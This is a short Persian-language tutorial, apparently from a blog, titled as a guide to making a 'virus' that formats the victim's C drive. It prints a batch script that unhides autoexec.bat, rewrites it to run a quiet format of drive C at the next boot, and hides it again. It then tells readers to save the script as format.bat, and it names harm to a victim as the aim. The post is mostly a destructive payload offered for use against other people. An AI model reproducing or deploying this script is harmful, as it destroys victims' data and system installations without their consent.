ساخت ويروس فرمت كننده ي درايو c

<<در اين ترفند مي خواهيم كه به شما ياد بديم چگونه يه ويروس بسازيد كه درايو c طرف قرباني را به طور كل فرمت كند >>

براي اين كار نت پد را باز كرده و عبارت زير را در ان كپي كنيد:
@echo off
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo format /autotest c:/q>nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
exit
 سپس SaveAs را انتخاب و فايل را با پسوند bat سيو كنيد يعني با نامي مثل format.bat كار اين ويروس اينه كه درايو c  طرف رو فرمت مي كنه و طرف مجبور ميشه دوباره ويندوز بريزه. اصلا روي اون كليك نكنيد كه به اين بلا گرفتار نشيد.....مطالب مرتبط با این پست: